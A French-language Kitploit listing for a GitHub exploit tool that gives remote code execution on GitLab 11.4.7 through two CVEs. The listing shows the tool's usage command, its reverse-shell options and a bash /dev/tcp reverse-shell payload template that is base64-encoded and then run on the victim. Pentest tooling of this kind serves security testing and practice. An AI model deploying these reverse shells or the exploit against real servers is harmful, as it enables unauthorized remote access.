Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
gitlab-RCE-11.4.7 — GitLab 11.4.7 Exploit RCE avec différents reverse shells. CVE-2018-19571 + CVE-2018-19585 | Kitploit
Outils/GitHubGitHub/algafix/gitlab-rce-11.4.7
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubalgafix/gitlab-rce-11.4.7

gitlab-RCE-11.4.7

GitLab 11.4.7 Exploit RCE avec différents reverse shells. CVE-2018-19571 + CVE-2018-19585

Voir le dépôt
33il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

gitlab-RCE-11.4.7

Exploit RCE pour GitLab 11.4.7 CE avec différents reverse shells.
CVE-2018-19571: https://nvd.nist.gov/vuln/detail/CVE-2018-19571
CVE-2018-19585: https://nvd.nist.gov/vuln/detail/CVE-2018-19585

Modification de la version de Sam Redmond and Tam Lai Yin dans le but d'apprendre et de pratiquer.

Comment utiliser

Il est écrit en python3, comme il se doit.

Dépendances :

root@kitploit:~
pip3 install requests

Utilisation :

root@kitploit:~
python3 rce_script.py -u <username> -p <password> -g <url:port> -l <local ip> -P <local port> [<shell lang>]

Par défaut, le shell netcat avec l'option -e est utilisé.

Shells intégrés

Shells intégrés actuels :

  • nc_e
    • Netcat avec l'option -e.
  • bash:
    • Bash exécuté avec le chemin absolu.
  • perl:
    • Perl exécuté depuis le $PATH.
  • python3:
    • Python3 exécuté depuis le $PATH.
  • ruby:
    • Ruby exécuté depuis le $PATH.
  • php:
    • PHP exécuté depuis le $PATH. Remarque : Ne fonctionne généralement pas dans le conteneur Docker GitLab.

Ajouter des shells définis par l'utilisateur

Certains shells contiennent des caractères qui ne s'accordent pas avec l'encodage de la requête. Par conséquent, ils sont encodés en Base64, puis décodés et exécutés sur la machine victime.

Si vous souhaitez ajouter votre propre shell, ajoutez une valeur à la structure payloads_dict.

Vous devez définir les éléments suivants :

root@kitploit:~
'bash': {
    # If the raw_payload can be executed withoud encoding
    'safe': False,
    # Payload, must contain the references for the local_ip and for the local_port
    'raw_payload': 'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1',
    # How to execute the payload if safe is False. Must conatin the reference for payload
    'exec_string': 'echo {payload} | base64 -d | /bin/bash'
}

Avertissement

L'analyse HTML est assez codée en dur, elle peut facilement se casser.

Télécharger l’outil